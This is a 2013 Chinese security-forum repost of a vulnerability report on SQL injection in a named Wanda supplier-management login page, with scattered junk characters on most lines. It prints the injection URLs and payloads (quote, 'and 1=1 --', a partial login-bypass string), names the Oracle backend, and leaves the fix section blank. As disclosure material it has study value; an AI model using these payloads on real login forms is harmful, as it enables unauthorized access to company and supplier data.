找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2650|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。! r% w& K: d" }1 \1 `
详细说明:. u8 Y- O0 x& i. K" E# ~2 E
万达scm系统登陆框sql注入。$ k) c1 U& c9 D$ |3 e

: w5 `/ d( o! O) [- k: L7 Whttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
) Z: }  l, y9 Z' Q) k" d- X
! b9 b+ _7 ^# |( i! l; @; R3 L! @/ z& Z0 N6 |
500错误。
5 c, J0 Y" F7 u9 I, J9 a" a
! y2 K, R6 S! |& ]% b7 h3 v用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
9 t8 i5 F1 @- R# @$ W2 khttp://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
: w  b7 [6 H" \. z截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)
. N. K) ^: Q* m8 g经过分析,登陆验证的过程应该是:
( A  O  o1 }5 b, R, f$ j+ x4 a) ^& U& o  F; ^) R% I
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。$ J  |! e+ W) F) M
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
. F& ?% P  D- H3 `( k' u
: G6 P& I8 v  O8 L! c* ?) e3 voracle数据库,存在注入点。@大连万达,你怎么看?
; R# n7 P$ I* ahttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png5 i( m; G7 G; b+ C. }3 i

8 Y! w1 a- Q9 C( T2 W% X系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。
( ]. S  n1 d" d% L4 G! `" h漏洞证明:
4 b1 K$ U% u: ~( n  n万达scm系统登陆框sql注入。
, I4 K; n1 D1 e  {7 A" i
$ F0 i8 g& u  A. V3 Z! fhttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27* |$ W0 W7 ?5 Y, ~2 _+ ?
) N1 O' c0 j  ]8 E4 Y  I3 @) X

6 G4 ~2 Q" V3 s, r500错误。' X) H. y+ a& F( X! f
% r6 w) g1 J3 a1 A) g) k
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。7 g- ^% {' o3 x( ?& g0 F
http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png
* D, D  j/ k5 G& @# ^
0 B* X6 c2 C8 k3 y
" b! u7 F* J! H( R(截图有一点问题)
3 {* p8 y. y4 c& h4 N  ^1 L) q
% c8 n" y: K) O怎么饶都饶不过去;经过分析,登陆验证的过程应该是:
' m7 ~9 o/ l5 S
9 ?$ z0 p0 u2 ?取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
- V% d5 [3 `0 s, r' G! i/ j; f* O
绕过:
- c9 L% E0 }) E+ s3 Rhttp://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1
/ i" k& Z$ T1 A, }1 F4 n! c1 C+ j% l4 E! m7 E

4 |  n9 h+ E2 Y2 W1 J/ soracle数据库,存在注入点。@大连万达,你怎么看?
4 E& c3 l/ u- D0 ]* |​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。: y  F/ [/ z+ g6 \
- h" R6 f8 {' X5 Y7 i7 v
修复方案:
. u% s1 O+ a5 t5 j! O/ h9 W4 v。。。/ F9 ~% ~: A' I$ T* z; I# f+ b& c

* A9 ?$ X! I) q) y6 T" C3 _6 Y# V, x. u" ]
厂商已经确认) o3 f( i/ V. X; ~7 Y2 }1 G2 n" m% j

! W" t5 f4 w1 D! d[/td][/tr]$ k: w+ Y( K* G9 y
[/table]
) S/ V) m3 }9 r" W( a2 w* C
* w: ]& \; g" L) N$ |0 f7 u
& W' n+ j% P* ^$ s. Q$ x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表